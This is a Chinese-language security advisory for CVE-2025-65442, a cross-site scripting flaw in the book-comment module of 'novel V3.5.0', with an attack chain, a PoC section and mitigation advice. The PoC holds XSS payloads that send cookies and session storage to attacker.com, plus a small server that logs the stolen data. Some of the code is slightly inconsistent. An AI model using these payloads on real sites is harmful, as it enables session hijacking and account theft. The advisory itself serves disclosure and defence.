CVE-2025-65442 novel V3.5.0 图书评论模块DOM型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-65442

漏洞类型

DOM型跨站脚本攻击(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

201206030 novel V3.5.0

漏洞概述

201206030 novel V3.5.0版本中存在一处DOM-based Cross-Site Scripting（DOM型跨站脚本攻击）漏洞。该漏洞位于图书评论模块，攻击者可以通过构造恶意的"wvstest"参数或向window.localStorage注入恶意脚本来利用此漏洞。由于应用程序对用户可控数据缺乏充分的验证和编码处理，未经过滤的用户输入被存储到后端数据库的book_comment表commentContent字段中，随后通过API返回给前端，并直接通过Vue 3的v-html指令渲染到页面DOM中，而未进行任何安全过滤或转义处理。攻击者利用此漏洞可以执行任意JavaScript代码或窃取敏感信息（如用户会话Cookie）。即使现代浏览器的内置XSS过滤器阻止了弹出式警报，攻击者仍可使用隐蔽的有效载荷绕过拦截并造成实际危害。

技术细节

漏洞根源在于Vue 3应用程序中使用了v-html指令直接渲染来自API的未经过滤的用户输入。具体技术细节如下：1) 攻击者提交包含恶意JavaScript代码的图书评论，该代码被存储到后端数据库book_comment表的commentContent字段；2) 当其他用户访问图书详情页时，后端API返回包含恶意代码的评论数据；3) 前端Vue 3应用使用v-html指令将评论内容直接渲染到DOM中；4) 恶意JavaScript代码在受害者浏览器中执行，可窃取Cookie、会话令牌或其他敏感信息。此外，攻击者还可以通过URL中的"wvstest"参数注入恶意脚本，或直接将恶意代码写入window.localStorage。v-html指令不会自动进行HTML实体编码或安全过滤，这使得攻击者可以完全控制渲染的HTML内容。

攻击链分析

STEP 1

步骤1

攻击者注册账号并登录novel V3.5.0应用

STEP 2

步骤2

攻击者向图书评论API提交包含恶意JavaScript代码的评论，代码被存储到book_comment表的commentContent字段

STEP 3

步骤3

受害者访问包含恶意评论的图书详情页

STEP 4

步骤4

后端API返回评论数据，前端Vue 3应用使用v-html指令将未过滤的内容直接渲染到页面DOM

STEP 5

步骤5

恶意JavaScript代码在受害者浏览器中执行，窃取Cookie、会话令牌等敏感信息并发送到攻击者服务器

STEP 6

步骤6

攻击者利用窃取的会话信息劫持受害者账号，进行进一步恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2025-65442 - DOM-based XSS in novel V3.5.0
// Method 1: Via URL parameter
// http://target-site/book/detail?wvstest=<img src=x onerror=this.src='http://attacker.com/steal?c='+document.cookie}>

// Method 2: Via book comment injection
// POST /api/comment with payload:
const maliciousPayload = {
  bookId: 123,
  commentContent: '<img src=x onerror="fetch(\"http://attacker.com/log?cookie=\"+document.cookie)\">'
};

// Method 3: Via localStorage injection
localStorage.setItem('comment', '<script>fetch("http://attacker.com/steal?data="+btoa(JSON.stringify(sessionStorage)))</script>');

// Exploitation script (attacker-controlled server)
const express = require('express');
const app = express();
app.get('/steal', (req, res) => {
  console.log('Stolen cookie:', req.query.cookie);
  // Log for later use in session hijacking
  res.send('XSS executed');
});

影响范围

201206030 novel V3.5.0

防御指南

临时缓解措施

在官方修复发布前，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)层面配置XSS防护规则，过滤包含script标签、onerror、onload等事件处理器属性的请求；2) 临时禁用图书评论功能或设置评论审核机制；3) 在前端添加全局XSS过滤中间件；4) 启用浏览器的XSS Auditor（如果可用）；5) 对敏感操作强制重新认证以降低会话劫持风险；6) 监控和日志记录异常请求以便及时发现攻击行为。